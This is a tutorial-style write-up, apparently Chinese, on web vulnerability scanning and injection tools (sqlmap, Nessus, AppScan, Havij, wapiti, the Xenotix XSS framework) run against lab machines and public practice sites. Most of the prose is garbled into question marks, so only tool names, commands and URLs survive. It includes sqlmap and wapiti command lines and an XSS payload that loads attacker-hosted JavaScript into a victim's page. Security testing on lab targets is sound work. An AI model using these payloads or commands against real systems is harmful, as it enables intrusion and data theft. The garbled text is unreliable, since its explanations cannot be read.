??????7??sqlmap??python??????£?
????????sql?????
??????????????????????????????????跽???????????????????????????????????????????????????
?????????sqlmap???
????sqlmap?????????????????????burpsuitePOSTsqlmap????????????Burpsuitesqlmap???http://www.freebuf.com/tools/6426.html??
????????
????1.????burpsuite??????????(?????????wvs????????http://testasp.vulnweb.com/Login.asp)??post????????????????????????籣???burpsuite_sql_post.txt
2. sqlmap.py -r "burpsuite_sql_post.txt" -p tfUName (????tfUPass)
?????????????
????2.wvs??192.168.184.135??
WVS (Web Vulnerability Scanner)????????????Web??ó??????????????????????κο????Web??????????????
?????????windows????wireshark?????????????????
?????磺tshark -D (???????)
tshark -i ?????? -b filesize:10240 (10M) -w "xxxxx.pcap"??10M????????棬????????????????????????漸??????????ο????????
????????????????????4??500??
????3.nessus4.x(5.x?汾??????)??192.168.184.135??
????Nessus???????????????????
?????????????xxxx??xxxxx
???????????????????????棬????????ο?????????????Ч??????
https://www.owasp.org/images/4/4f/Web_Application_Vul_Testing_with_Nessus_2012.02.01.pdf
?????????3????
???????????????????????????????????????????????????????Ч???????
????4.WebCruiserEnt??????????????log192.168.184.130??
Web?????蹤??WebCruiser - Web Vulnerability Scanner
????Web??????????????????????????????????裬????????????????SQL???????????XPath???????????????????????????????????????SQL??????XPath?????????????????
????5.appscan?????????webgoat??????????????????????????????????????????????payload???????????
?????????????????????????????192.168.184.135??
http://public.dhe.ibm.com/software/dw/cn/demos/rIntroToAppScan/rIntroToAppScan.pdf
http://www.nxadmin.com/tools/675.html
http://www.360doc.com/content/11/0831/10/284310_144677089.shtml
????6.safe3wvs?????????????????????webgoat?м????????192.168.184.135??
?????????????????????????????????????????????cookie??????????????temperdata?????cookie??????????
??????????????
????SQL???XSS????
7. Xenotix XSS Exploit Framework V4?????????????д?????????????????????????
????owasp?????????????WEB??ó????е?XSS??????????????????????????????????????xss?????web?????
????????????????÷???????????????IP??????4.5?汾???????127.0.0.1:5050
????????????????????????????????y????????е?????????±????н????youtube?????????
????1.??????????????victim???????????????url???????裬?????????й?????????裬?????????????????????????XSS????????
??????????????????ò??????????????????????js?????
????2.????и???????????????????????????????XSS???????????????????????????????
????????XSS???http://192.168.184.135/aa.php?id=1
??????????id????????XSS??в??????????????????
????http://192.168.184.135/aa.php?id=1<script>127.0.0.1:5050/xss.js</script>
????????????????????????Щ??????е????????????????victim?????????????JS???????????????
????8.Havij??????????????log192.168.184.130??
????Havij????????????SQL?????
????(??????????????????????蹤??????羭??????safe3wvs???????????????????????????????ù???????????????????е?????????
?????????????????????????)
?????????dvwa??????????????????????????
????9.wapiti??python??????£???????????????log192.168.184.130??
????sql?????
????????3.x?汾???exe????????py?????????????python???
???????????????????web??蹤???????????????????????SQL??LDAP??CRLF??????????????????????????????????С?wapiti????python????????????????????????????pythonvm???????
????1.??????dvwa??????Ч???????
??????1?????е??????????л??cookie?????????????????cookie?????????json???????????????汾?????£?
C:\xxx\software\wapiti-2.3.0-win32-standalone\wapiti-2.3.0-win32-standalone>wapiti-getcookie.exe cookie.json http://192.168.184.141/dvwa/
??????2??????cookie???裬-s?????????????????????????????????????????±???
C:\dd\software\wapiti-2.3.0-win32-standalone\wapiti-2.3.0-win32-standalone>wapiti.exe "http://192.168.184.141/dvwa/" -c cookie.json -s "http://192.168.184.141/dvwa/vulnerabilities/"
??????3??????????????????????????????Щ??????http://lzy.iteye.com/blog/338178?????nikto?????????????????????????????????
????????????????????Щ???????????????????ν?????????????py???????
??????4??????????url?????????????????url???????????????????????????????????????????
C:\dd\software\wapiti-2.3.0-win32-standalone\wapiti-2.3.0-win32-standalone>wapiti.exe "http://192.168.184.141/dvwa/" -c cookie.json -s "http://192.168.184.141/dvwa/vulnerabilities/sqli/?id="
????????Ч??????????????????????????????login.php??SQL???
???????testfireЧ????Щ??????
C:\xxxx\software\wapiti-2.3.0-win32-standalone\wapiti-2.3.0-win32-standalone>wapiti-getcookie.exe cookie.json http://demo.testfire.net/bank/login.aspx
C:\xxx\software\wapiti-2.3.0-win32-standalone\wapiti-2.3.0-win32-standalone>wapiti.exe http://demo.testfire.net/ -c cookie.json -x http://demo.testfire.net/bank/logout.aspx
????10.pangolin?????
???????????????